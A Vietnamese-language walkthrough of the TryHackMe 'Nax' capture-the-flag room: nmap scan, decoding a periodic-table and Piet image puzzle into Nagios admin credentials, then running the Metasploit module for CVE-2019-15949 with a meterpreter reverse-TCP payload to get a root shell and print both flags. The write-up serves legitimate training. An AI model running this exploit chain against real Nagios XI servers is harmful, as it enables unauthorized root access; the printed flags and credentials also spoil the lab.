Tryhackme - Nax

Hôm nay tôi sẽ giải CTF TryHackMe - Nax

PORT     STATE SERVICE    REASON         VERSION
22/tcp   open  ssh        syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 62:1d:d9:88:01:77:0a:52:bb:59:f9:da:c1:a6:e3:cd (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCw9lXSbmWYgGcDpP5NiHE9MMRQktk72HpmKY50dVs/GbfJMNa29eJNKsZ2XfAVsGUuxRdX42/fvaAUOoSZlNlARJUOhS+3fRX14Qx9itHqEoYTXXnSZ+lYc4HGbMkbGlbW3CqQ6zxO9kEbe8DbFi9BPkGOvjMk5mrVYqOpROlZwJvwCtK4g+LNkZibj3VZvZ+Ex410r4Xqd4TeIe+NRVmCEG5I57w60wZTwS6WAhQ86Td8ZhDr0hlN82vKe8KK8Q6Qyt4NNa4GrwJAil0DMSSrSdgiFPWfSBN0RcaGq6xTyd3m4bUmKfqSJ+hhvpoQ5CJNQK5dtIfLulV5iEVWXKtV
|   256 af:67:7d:24:e5:95:f4:44:72:d1:0c:39:8d:cc:21:15 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBA6AY/MaydX6jLtiYXUhTaSQuNB4h08nsJd8MIxQ4b77d5qBK89b0rXrmxH8TavI5HpHOnAYeSMWcgrWcKAnBXk=
|   256 20:28:15:ef:13:c8:9f:b8:a7:0f:50:e6:2f:3b:1e:57 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICcps6PPy9z/iS7bgKohT/GXERf6a6hWzhuWyeNMtzcw
25/tcp   open  smtp       syn-ack ttl 63 Postfix smtpd
| ssl-cert: Subject: commonName=ubuntu
| Issuer: commonName=ubuntu
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-03-23T23:42:04
| Not valid after:  2030-03-21T23:42:04
| MD5:   9b85:15ad:46a7:016e:319a:033d:7d96:edbe
| SHA-1: c488:0c2d:a210:38dd:cfbb:a299:4a2a:b69c:63fd:2cdc
| -----BEGIN CERTIFICATE-----
| MIICsjCCAZqgAwIBAgIJAMztBzdUafrfMA0GCSqGSIb3DQEBCwUAMBExDzANBgNV
| BAMMBnVidW50dTAeFw0yMDAzMjMyMzQyMDRaFw0zMDAzMjEyMzQyMDRaMBExDzAN
| BgNVBAMMBnVidW50dTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAM4f
| Mj+6LmA7krMf32EdXKtdfPVFVFf3367a+trh4/H6MHZJVOpZ+CrH1j4RTjr9SONC
| l5Fzrz1hR1o1oXIwsAXrtqcvYGeNT7gwH4D6m6zifSaOAWEy/IMsbe3+sPMIUPlS
| 4NdFl4J6PeyeAAnShUzAOAdUqsvSsAmmvN3ze+Y2OGGfOlO1s7n25FDs72zXo2nX
| i1EO+1mVdUWuM/Qr8Zctilwv9QNPWxcoTG/Zac/q8/pboWaUg3pf6mfFLbwo96ba
| 8p8QR8gfD1Vc1xQMN98/2lPxo8ISkW9ffcBzy0ILIhkSD/8EmynmC7FhgogCU+/l
| fYpeC3wLLigkDZnOgL0CAwEAAaMNMAswCQYDVR0TBAIwADANBgkqhkiG9w0BAQsF
| AAOCAQEABDjkkOLVJfqNq1qSDGBgu7IJCG1CAByl82DGlam2nsVBhji54hviiyBi
| euCyeqJRPOX2qS7Kl0scMFw+DVxNW867HcrtTYEHuo1gOCGX3QFz+eUuKf+4X1Wr
| a7VgSeYVhboT4w4tKm8Rprh7QkHp9MNTB9TR/edG9RtFJZXtSlykeS5lLeC3DjRw
| 0NhWpgG2ZLa9URDrpzErvVwOBN46IS0PqwDCxJSvsH6sBQhgrm5so71jrPHwmh/o
| aaqO96Rw+1aRRLwz0O0TEO4aMw8/seeiRJ8w4kXMOy9UrCM5+yW6fbtMKYsmEPJO
| RxSanrURYb9UJxdRfeWPqWYU1AHVwg==
|_-----END CERTIFICATE-----
|_smtp-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_smtp-commands: ubuntu.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: TLS randomness does not represent time
80/tcp   open  http       syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
389/tcp  open  ldap       syn-ack ttl 63 OpenLDAP 2.2.X - 2.3.X
443/tcp  open  ssl/http   syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=192.168.85.153/organizationName=Nagios Enterprises/stateOrProvinceName=Minnesota/countryName=US/organizationalUnitName=Development/localityName=St. Paul
| Issuer: commonName=192.168.85.153/organizationName=Nagios Enterprises/stateOrProvinceName=Minnesota/countryName=US/organizationalUnitName=Development/localityName=St. Paul
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2020-03-24T00:14:58
| Not valid after:  2030-03-22T00:14:58
| MD5:   636c:ab0f:6399:34e3:b6de:e6e2:b294:d4ef
| SHA-1: 80cd:2e1b:110f:1b5f:1943:1b3f:c218:71e7:8b98:6801
| -----BEGIN CERTIFICATE-----
| MIIDzTCCArWgAwIBAgIBADANBgkqhkiG9w0BAQUFADCBgDELMAkGA1UEBhMCVVMx
| EjAQBgNVBAgMCU1pbm5lc290YTERMA8GA1UEBwwIU3QuIFBhdWwxGzAZBgNVBAoM
| Ek5hZ2lvcyBFbnRlcnByaXNlczEUMBIGA1UECwwLRGV2ZWxvcG1lbnQxFzAVBgNV
| BAMMDjE5Mi4xNjguODUuMTUzMB4XDTIwMDMyNDAwMTQ1OFoXDTMwMDMyMjAwMTQ1
| OFowgYAxCzAJBgNVBAYTAlVTMRIwEAYDVQQIDAlNaW5uZXNvdGExETAPBgNVBAcM
| CFN0LiBQYXVsMRswGQYDVQQKDBJOYWdpb3MgRW50ZXJwcmlzZXMxFDASBgNVBAsM
| C0RldmVsb3BtZW50MRcwFQYDVQQDDA4xOTIuMTY4Ljg1LjE1MzCCASIwDQYJKoZI
| hvcNAQEBBQADggEPADCCAQoCggEBANdnw2CkJpNnnwjJ+PaxonTH/G5TSKLru67c
| aQyy4FhI/xa+0Dwn/HjWnWIOE3gOQB7QyOyG30guUpFohUEtC9agL7tpogpxrV8l
| ie0vhXsz0ETdzMhaou6QOrLS1OSspAh+t492t71BILl6ReHPLoFyEghyRctP/iK0
| PelUJKndJ2ElpLdbkMUuVzQ9mp8qIjoTF4CS1JwiUESCtikRmZWp398buklzNGgF
| VZIRJPu5VZMPGc7Ui3QUSaTF2aqi9FRXZRXN+0q2nWvdUFrUqnzrmaVynOupGXhS
| O17VZtC9F/GM+yWpg3Lck9wevt5o3nnYW4k8h5kDNHu4f0oDR88CAwEAAaNQME4w
| HQYDVR0OBBYEFFRhBQ3MZkrfjRqOlHjApJZAN+juMB8GA1UdIwQYMBaAFFRhBQ3M
| ZkrfjRqOlHjApJZAN+juMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADggEB
| ABeWyFzGfxf3vmGuLXdDXVj5e1LwBlvoNmHGf11Buy/yljpUI6jg1HxUTSABU/iS
| ZSsCnwOQ5dtqRAIcvFp07ZlUw9DpeSChj2jxXw+YxINOSqqNgE66zelXV9rJb7TX
| HWho2/g6OzKs5ii2h5lyjlValQAgfxBYJpRjvf4FfIJpzL+RnrsOqJBNUurbAn1L
| yNkqSDJhCPNN/g0V6eyOZRjTipV2FzcHYrbt84qFPN8gQ5Rpd6wNOWoUfuY1tL6H
| yepaZ/iLv+wY60Kxd8+GD4Oy7Tpz+Ilkr48EIUffejHzVrcn7JikS8+Uf8nvDi9Q
| LnC7LykFocxS13IXPcTfrnI=
|_-----END CERTIFICATE-----
|_http-title: 400 Bad Request
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_ssl-date: TLS randomness does not represent time
5667/tcp open  tcpwrapped syn-ack ttl 63
Service Info: Host:  ubuntu.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Có khá nhiều port đang mở, nhưng tôi sẽ thử đi qua các port của web service trước là 80 và 443. Truy cập vào trang web, tôi nhận được một vài gợi ý (hoặc ít nhất là tôi nghĩ vậy)

					Welcome to elements.
				Ag - Hg - Ta - Sb - Po - Pd - Hg - Pt - Lr

Có thể nhận ra ngay đây là các ký hiệu đại diện của các nguyên tố trong bảng tuần hoàn hóa học. Mỗi nguyên tố đều có số hiệu nguyên tử riêng. Tôi có thể dựa vào nó để tạo ra 1 dãy số mới

				Ag - Hg - Ta - Sb - Po - Pd - Hg - Pt - Lr
				47   80   73   51   84   46   80   78   103

Convert dãy số trên thành ascii, tôi có hidden file

PI3T.PNg

Tải file ảnh này về và dùng exiftool để phân tích

┌──(rootkali)-[/home/kali]
└─# exiftool Downloads/PI3T.PNg 
ExifTool Version Number         : 12.57
File Name                       : PI3T.PNg
Directory                       : Downloads
File Size                       : 982 kB
File Modification Date/Time     : 2023:07:21 13:50:34-04:00
File Access Date/Time           : 2023:07:21 13:50:34-04:00
File Inode Change Date/Time     : 2023:07:21 13:50:34-04:00
File Permissions                : -rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 990
Image Height                    : 990
Bit Depth                       : 8
Color Type                      : Palette
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Palette                         : (Binary data 768 bytes, use -b option to extract)
Transparency                    : (Binary data 256 bytes, use -b option to extract)
Artist                          : Piet Mondrian
Copyright                       : Piet Mondrian, tryhackme 2020
Image Size                      : 990x990
Megapixels                      : 0.980

Ở đây tôi có người tạo ra file này

Piet Mondrian

Tiếp theo tôi cần convert file ảnh này sang ppm. Có thể dùng các web convert trên mạng ví dụ như Convertio — File Converter

Mất một lúc tìm kiếm xung quanh cái tên Piet và ppm format thì tôi tìm được một công cụ, hay đúng hơn là ngôn ngữ lập trình màu sắc

Tải nó về và giải nén

┌──(rootkali)-[/home/kali]
└─# ./npiet /Downloads/PI3T.ppm
nagiosadmin%n3p3UQ&9BjLp4$7uhWdYnagiosadmin%n3p3UQ&9BjLp4$7uhWdYnagiosadmin

username: nagiosadmin password: n3p3UQ&9BjLp4$7uhWdY

Thử truy cập nagios

Ngay trên trang chủ của Nagios có hiện phiên bản hiện tại là 4.4.2. Thử tìm các lỗ hổng với Nagios 4.4.2 và tôi tìm thấy CVE-2019-15949

Sử dụng Metasploit để tìm CVE này, tôi tìm được module

exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce)

Cấu hình các thông số trong exploit

msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > show options

Module options (exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce):

   Name            Current Setting       Required  Description
   ----            ---------------       --------  -----------
   FINISH_INSTALL  false                 no        If the Nagios XI installation has not been completed, try to do so. This includes signing the license agreement.
   PASSWORD        n3p3UQ&9BjLp4$7uhWdY  yes       Password to authenticate with
   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          10.10.208.133         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT           80                    yes       The target port (TCP)
   SSL             false                 no        Negotiate SSL/TLS for outgoing connections
   SSLCert                               no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/            yes       The base path to the Nagios XI application
   URIPATH                               no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin           yes       Username to authenticate with
   VHOST                                 no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.8.105.194     yes       The listen address (an interface may be specified)
   LPORT  6666             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux (x64)


View the full module info with the info, or info -d command.
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > run

[*] Started reverse TCP handler on 10.8.105.194:6666 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.5.6.
[+] The target appears to be vulnerable.
[*] Uploading malicious 'check_ping' plugin...
[*] Command Stager progress - 100.00% done (897/897 bytes)
[+] Successfully uploaded plugin.
[*] Executing plugin...
[*] Waiting up to 300 seconds for the plugin to request the final payload...
[*] Sending stage (3045348 bytes) to 10.10.208.133
[*] Meterpreter session 1 opened (10.8.105.194:6666 -> 10.10.208.133:56918) at 2023-07-21 16:32:40 -0400
[*] Deleting malicious 'check_ping' plugin...
[+] Plugin deleted.

meterpreter > shell
Process 2440 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
pwd
/root
ls -la
total 28
drwx------  4 root root 4096 Mar 24  2020 .
drwxr-xr-x 23 root root 4096 Mar 23  2020 ..
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
drwxr-xr-x  2 root root 4096 Mar 24  2020 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   38 Mar 24  2020 root.txt
drwxr-xr-x  2 root root 4096 Mar 23  2020 scripts
cat root.txt
THM{c89b2e39c83067503a6508b21ed6e962}
ls -la /home
total 12
drwxr-xr-x  3 root   root   4096 Mar 23  2020 .
drwxr-xr-x 23 root   root   4096 Mar 23  2020 ..
drwxr-xr-x  8 galand galand 4096 Mar 24  2020 galand
ls -la /home/galand
total 56
drwxr-xr-x 8 galand galand 4096 Mar 24  2020 .
drwxr-xr-x 3 root   root   4096 Mar 23  2020 ..
-rw------- 1 root   root    481 Mar 24  2020 .bash_history
-rw-r--r-- 1 galand galand  220 Mar 23  2020 .bash_logout
-rw-r--r-- 1 galand galand 3771 Mar 23  2020 .bashrc
drwx------ 2 galand galand 4096 Mar 23  2020 .cache
drwxr-xr-x 6 root   root   4096 Mar 23  2020 .cpan
drwx------ 2 root   root   4096 Mar 23  2020 .gnupg
drwxrwxr-x 2 galand galand 4096 Mar 24  2020 .nano
-rw-r--r-- 1 galand galand  655 Mar 23  2020 .profile
-rw------- 1 root   root   1024 Mar 23  2020 .rnd
drwxr-xr-x 3 root   root   4096 Mar 23  2020 .subversion
-rw-r--r-- 1 galand galand    0 Mar 23  2020 .sudo_as_admin_successful
drwxr-xr-x 9 galand galand 4096 Mar 23  2020 nagiosxi
-rw-rw-r-- 1 galand galand   38 Mar 24  2020 user.txt
cat /home/galand/user.txt
THM{84b17add1d72a9f2e99c33bc568ae0f1}

© 2024. All rights reserved.